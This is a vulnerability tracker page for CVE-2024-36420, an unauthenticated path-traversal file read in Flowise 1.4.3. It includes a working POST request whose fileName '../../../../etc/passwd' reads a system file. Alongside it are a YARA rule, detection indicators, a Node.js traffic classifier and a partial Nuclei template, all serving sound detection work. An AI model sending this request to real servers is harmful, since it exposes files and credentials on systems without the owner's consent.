CVE-2024-36420
Published 2024-07-01
Priority: P3, 54 · Severity: high · CVSS 3.1: 7.5
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EXPLOIT
EPSS: 1.76% (75.2th percentile)
Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, the `/api/v1/openai-assistants-file` endpoint in `index.ts` is vulnerable to arbitrary file read due to lack of sanitization of the `fileName` body parameter. No known patches for this issue are available.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flowiseai | flowise | <= 1.4.3 | — |
| flowiseai | flowise | — | — |
| flowiseai | flowise | 0 – 1.4.3 | — |
Detection & IOCs
command
```http
POST /api/v1/openai-assistants-file HTTP/1.1
Content-Type: application/json

{"fileName":"../../../../etc/passwd"}
```
yara
```yara
rule CVE_2024_36420_Flowise_LFI
{
    strings:
        $req = "/api/v1/openai-assistants-file"
        $traversal = "../../../../etc/passwd"
    condition:
        $req and $traversal
}
```
- Detect POST requests to /api/v1/openai-assistants-file containing path traversal sequences (e.g., '../') in the 'fileName' JSON body parameter
- Successful exploitation returns HTTP 200 with response body matching Unix /etc/passwd format (root:*:0:0:) and a response header containing 'attachment; filename=passwd'
- Match response body for passwd file patterns: lines beginning with 'root:[^:]*:0:0:' or 'daemon:[^:]*:[0-9]+:[0-9]+:' to confirm successful arbitrary file read
- No known patches are available for this vulnerability in Flowise 1.4.3; the endpoint is unauthenticated (unauth tag), meaning no credentials are required to exploit it
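The detection notes above, implemented as an added example (not code from Flowise or from the indexed sources): a Node.js classifier for captured request/response pairs. The record shape (`method`, `path`, `reqBody`, `status`, `resHeaders`, `resBody`) and the verdict names are assumptions, and flagging absolute paths and backslash separators goes beyond the `../` indicator listed on this page.

```javascript
// Added example, not Flowise or site code. Transaction record shape is assumed.
const ENDPOINT = '/api/v1/openai-assistants-file';
// passwd-style lines named in the detection notes
const PASSWD_RE = /^(root:[^:]*:0:0:|daemon:[^:]*:[0-9]+:[0-9]+:)/m;

// True when fileName has a ".." path segment, or is absolute (conservative extra).
function isTraversal(fileName) {
  if (typeof fileName !== 'string') return false;
  const unified = fileName.replace(/\\/g, '/'); // treat backslashes as separators
  if (unified.startsWith('/') || /^[A-Za-z]:/.test(unified)) return true;
  return unified.split('/').includes('..'); // whole segment, so "a..b" is not flagged
}

// Classify one captured request/response pair.
function classify(tx) {
  if (tx.method !== 'POST' || tx.path.split('?')[0] !== ENDPOINT) return 'ignore';
  let fileName;
  try {
    fileName = JSON.parse(tx.reqBody).fileName;
  } catch {
    return 'malformed'; // body is not parseable JSON (or is null)
  }
  if (!isTraversal(fileName)) return 'benign';
  const disposition = String((tx.resHeaders || {})['content-disposition'] || '');
  const served = /attachment;\s*filename=/i.test(disposition) ||
    PASSWD_RE.test(tx.resBody || '');
  return tx.status === 200 && served ? 'confirmed-read' : 'attempt';
}

// Constructed sample transactions (not real traffic).
const SAMPLES = [
  { method: 'POST', path: ENDPOINT, reqBody: '{"fileName":"../../../../etc/passwd"}',
    status: 200, resHeaders: { 'content-disposition': 'attachment; filename=passwd' },
    resBody: 'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n' },
  { method: 'POST', path: ENDPOINT, reqBody: '{"fileName":"..\\\\..\\\\secrets.env"}',
    status: 500, resHeaders: {}, resBody: '' },
  { method: 'POST', path: ENDPOINT, reqBody: '{"fileName":"report..v2.pdf"}',
    status: 200, resHeaders: { 'content-disposition': 'attachment; filename=report..v2.pdf' },
    resBody: '%PDF' },
  { method: 'GET', path: '/api/v1/chatflows', reqBody: '', status: 200,
    resHeaders: {}, resBody: '[]' },
];

const scan = (txs) => txs.map(classify);
console.log(scan(SAMPLES));
```

A `confirmed-read` verdict means a file was served in response to a traversal request and should be triaged as data exposure; `attempt` means the request matched but the response did not confirm a read.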
OSV
Flowise Path Injection at /api/v1/openai-assistants-file
osv·2024-08-05
CVE-2024-36420 [HIGH] Flowise Path Injection at /api/v1/openai-assistants-file
GHSA
Flowise Path Injection at /api/v1/openai-assistants-file
ghsa·2024-08-05
CVE-2024-36420 [HIGH] CWE-74 Flowise Path Injection at /api/v1/openai-assistants-file
No detection rules found.
Nuclei
Flowise 1.4.3 - Arbitrary File Read
nuclei·CVSS 7.5
CVE-2024-36420 [HIGH] Flowise 1.4.3 - Arbitrary File Read
Flowise 1.4.3 contains a path traversal caused by lack of sanitization of the 'fileName' parameter in the /api/v1/openai-assistants-file endpoint in index.ts, letting attackers read arbitrary files. Exploitation requires the attacker to send a crafted request.
Template:
```yaml
id: CVE-2024-36420
info:
  name: Flowise 1.4.3 - Arbitrary File Read
  author: fineman999
  severity: high
  description: |
    Flowise 1.4.3 contains a path traversal caused by lack of sanitization of 'fileName' parameter in /api/v1/openai-assistants-file endpoint in index.ts, letting attackers read arbitrary files, exploit requires attacker to send crafted request.
  impact: |
    Attackers can read arbitrary files on the server, potentially exposing sensitive information.
  remediation: |
    No known patches available; con
```
No writeups or analysis indexed.
- https://github.com/FlowiseAI/Flowise/blob/e93ce07851cdc0fcde12374f301b8070f2043687/packages/server/src/index.ts#L982
- https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/